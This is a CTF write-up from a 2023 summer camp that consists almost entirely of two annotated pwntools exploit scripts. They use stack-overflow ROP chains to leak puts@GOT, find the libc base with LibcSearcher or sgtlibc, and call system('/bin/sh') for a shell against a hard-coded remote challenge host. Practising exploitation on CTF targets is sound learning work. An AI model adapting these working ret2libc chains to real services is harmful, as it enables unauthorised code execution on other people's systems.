山石安研院2023CTF夏令营_pwn


两道题都用ret2libc了,最后一道heap0解
ret2syscall

"""Writeup listing for the "ret2syscall" challenge (two-stage ret2libc).

Stage 1 overflows the stack buffer with a ROP chain that calls puts() on
puts@GOT and returns to main; stage 2 uses the leaked value to locate libc
via LibcSearcher and builds a second chain that calls system().

NOTE: this is a flat script with side effects at import time -- it opens a
TCP connection to the hard-coded remote host as soon as it is executed.
Addresses below are binary-specific constants taken from the challenge
binary (not shown on this page).
"""
from pwn import*
from LibcSearcher import *
elf=ELF('./pwn')  # loaded but never used below; the addresses are hard-coded instead
p = remote('58.240.236.231',49003)
# Gadget / symbol addresses in the target binary. They are fixed values, so the
# binary is presumably non-PIE (PIE would randomise them) -- confirm with checksec.
pop_rdi_ret = 0x40072b
ret_addr = 0x400509   # single `ret`; presumably used for stack alignment before system() -- confirm
main_addr = 0x4006c7
syscall = 0x400741    # unused in this listing
puts_plt = 0x400520
puts_got = 0x601018

# Stage 1: 64 + 8 bytes of filler (buffer plus, presumably, the saved rbp -- the
# sizes come from the binary), then: pop rdi <- puts@GOT; call puts@PLT;
# return to main so the process stays alive for stage 2.
payload = b'a'*64+b'b'*8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)

# Read up to the first 0x7f byte (the high byte of a typical x86-64 libc
# address), keep the last 6 bytes and zero-pad to 8 for u64().  Fragile: any
# earlier 0x7f byte in the program's output would break the parse.
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\00'))
log.info("puts addr is :%x"%puts_addr)
# Resolve libc offsets from the leaked puts address via LibcSearcher's
# database; see the author's note after the second listing on how unreliable
# this matching was for them.
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_addr = libc_base + libc.dump('str_bin_sh')  # computed but NOT used: the chain below passes 0x601048 instead
# Stage 2: same filler, then `ret` (alignment), pop rdi <- 0x601048 (a fixed
# address in the binary, presumably where the author placed "/bin/sh"; it is
# not the libc string resolved above), then system().
payload = b'a'*64+b'b'*8 + p64(ret_addr)+ p64(pop_rdi_ret) + p64(0x601048) + p64(system_addr)
p.sendline(payload)
p.interactive()

ret2libc

"""Writeup listing for the "ret2libc" challenge.

Same two-stage structure as the first listing: leak puts@GOT through a
puts@PLT call and return to main, then resolve libc offsets -- here with
sgtlibc instead of LibcSearcher -- and send a system("/bin/sh") chain.

NOTE: runs on import; the remote() call connects to the hard-coded host
immediately.  Addresses are binary-specific constants from the challenge
binary (not shown on this page).
"""
from pwn import*
import sgtlibc
elf=ELF('./pwn')  # loaded but unused; addresses are hard-coded below
p = remote('58.240.236.231',49002)
libc =ELF('libc-2.23.so')  # loaded but unused: the offsets actually come from sgtlibc, not this file
# Fixed addresses in the target binary (presumably non-PIE -- confirm with checksec).
pop_rdi_ret = 0x400783
ret_addr = 0x400509   # single `ret`, presumably for stack alignment -- confirm
main_addr = 0x4006FD
puts_plt = 0x400520
puts_got = 0x601018
bss = 0x601060        # unused in this listing
# Stage 1: 208 + 8 bytes of filler, then pop rdi <- puts@GOT; puts@PLT; back to main.
payload1 = b'a'*208+b'b'*8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendline(payload1)

# Leak parse: read up to the first 0x7f byte, take the last 6 bytes, zero-pad
# to 8 for u64().  Breaks if the program emits a 0x7f byte before the address.
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\00'))
# Match the leaked puts address against sgtlibc's libc database.  db_index=3 is
# a manual pick among several candidates; a wrong candidate yields wrong
# offsets and a silent failure of stage 2.
s = sgtlibc.Searcher()
s.add_condition('puts',puts_addr)
s.dump(db_index=3) # search libc , if returns multi-result ,default use index-0's result

# Offsets (relative to libc base) of the symbols the chain needs.
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
puts_addr_ = s.get_address(sgtlibc.s_puts)

print(hex(system_addr), hex(binsh_addr), hex(puts_addr_))
# Rebase: leaked runtime address minus the database offset gives libc's base.
libc_base = puts_addr - puts_addr_
system = libc_base + system_addr
bin_sh = libc_base + binsh_addr

# Stage 2: filler, `ret` (alignment), pop rdi <- "/bin/sh" in libc, system(),
# plus a trailing ret_addr as the return address after system().
payload2 = b'a'*208+b'b'*8 + p64(ret_addr) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)+ p64(ret_addr)

# Unlike stage 1, this send waits for the "name:" prompt first.
p.sendlineafter("name:",payload2)
p.interactive()

# LibcSearcher's results were never right -- infuriating!